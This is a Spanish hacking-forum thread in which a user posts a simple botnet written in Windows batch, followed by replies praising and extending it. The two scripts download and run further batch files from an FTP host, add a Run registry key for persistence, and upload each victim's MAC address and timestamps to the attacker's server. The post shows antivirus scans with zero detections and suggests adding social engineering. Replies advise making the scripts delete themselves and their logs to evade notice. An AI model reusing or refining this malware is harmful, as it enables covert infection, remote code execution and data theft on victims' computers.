Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Botnet sencila [Batch]

  • 6 Respuestas
  • 3690 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    3.33%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Agosto 15, 2015, 11:10:46 am »
Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.

Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.

Código: DOS
  1. @echo off
  2.  
  3. cd C:\Users\%username%
  4.  
  5. set ruta=%CD%
  6.  
  7. rem Prepara el archivo que controla las máquinas infectadas.
  8.  
  9. set numero=%random%
  10.  
  11. echo %numero% > numero.txt
  12.  
  13. getmac > %numero%
  14.  
  15. del ftp.txt
  16. echo open host >> ftp.txt
  17. echo userdown >> ftp.txt
  18. echo passdown >> ftp.txt
  19. echo get Fecha.bat >> ftp.txt
  20. echo quit >> ftp.txt
  21.  
  22. start /min ftp -s:ftp.txt
  23.  
  24. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat
  25.  

SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907 
Nombre: Malware.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto ) 

El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.

Código: DOS
  1. @echo off
  2.  
  3. rem Crea un txt con la fecha y hora actual.
  4.  
  5. rem Lee el número del archivo numero.txt
  6.  
  7. for /f "tokens=*" %%x in (numero.txt) do (
  8. set nombre=%%x
  9. goto escribir
  10. )
  11.  
  12. :escribir
  13.  
  14. rem Escribe el archivo
  15.  
  16. echo ----------------- >> %nombre%
  17. echo fecha: %date% >> %nombre%
  18. echo hora: %time% >> %nombre%
  19.  
  20. rem Envía el archivo.
  21.  
  22. del ftp.txt
  23. del ftp1.txt
  24. echo open host >> ftp.txt
  25. echo userfecha>> ftp.txt
  26. echo passfecha>> ftp.txt
  27. echo put %nombre% >> ftp.txt
  28. echo quit >> ftp.txt
  29.  
  30. start /min ftp -s:ftp.txt
  31.  
  32. rem Ejecuta el archivo que he subido
  33.  
  34. echo open host >> ftp1.txt
  35. echo userdown>> ftp1.txt
  36. echo passdown>> ftp1.txt
  37. echo get eject.bat >> ftp1.txt
  38. echo quit >> ftp1.txt
  39.  
  40. start /min ftp -s:ftp1.txt
  41.  
  42. timeout /t 15
  43.  
  44. start eject.bat

SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456 
Nombre: Fecha.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos ) 

Los timeout los pongo porque el host que utilizo es lento,

En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.

Acepto ideas y criticas

!Saludos¡

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1915
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Agosto 15, 2015, 04:51:01 pm »
Nada mal @rollth, doy por hecho que lo has programado tu no?

Saludos.



Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    3.33%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #2 en: Agosto 15, 2015, 05:35:05 pm »
Nada mal @rollth, doy por hecho que lo has programado tu no?

Saludos.

@blackdrake si, lo he programado yo, es sencillo pero puede servir.


Desconectado roadd

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Hacking Desde Cero By Roadd Dogg
  • Skype: r0add@hotmail.com
  • Twitter: @RoaddHDC
« Respuesta #3 en: Agosto 15, 2015, 08:14:24 pm »
Me encanta la idea y el programa! :D
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano
Web: www.hackingdesdecero.org
Igm: /secureart
Telegram: @roaddhdc
Correo: r0add@hotmail.com
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: www.youtube.com/channel/UCx8hRcHzHboIjpyfCWz_W_w

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #4 en: Agosto 15, 2015, 11:33:50 pm »
muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos :)
El arte de crear malware, es algo que solo pocos entienden!


Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    3.33%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #5 en: Agosto 16, 2015, 05:17:49 am »
Muchas gracias @roadd

@xxneeco83xx Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #6 en: Agosto 16, 2015, 05:21:39 am »
Muchas gracias @roadd

@xxneeco83xx Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.
El arte de crear malware, es algo que solo pocos entienden!


 

¿Te gustó el post? COMPARTILO!



Underc0de Tools | Raven Botnet V1.0

Iniciado por q3rv0

Respuestas: 45
Vistas: 21717
Último mensaje Enero 21, 2015, 08:15:52 am
por Snifer
Botnet Ricard (BANK) BY CAMPEX

Iniciado por campex

Respuestas: 2
Vistas: 1857
Último mensaje Diciembre 09, 2014, 02:11:22 pm
por campex
Ender Botnet v1.0 by Baku

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2158
Último mensaje Octubre 04, 2014, 03:16:20 pm
por Baku
Spacenet-Python Botnet

Iniciado por lucky1234

Respuestas: 2
Vistas: 2235
Último mensaje Febrero 13, 2018, 02:16:16 pm
por Spaceb4r
Neutrino v3.6 - Botnet Bancaria

Iniciado por ANTRAX

Respuestas: 3
Vistas: 3702
Último mensaje Febrero 28, 2016, 10:47:06 am
por Stiuvert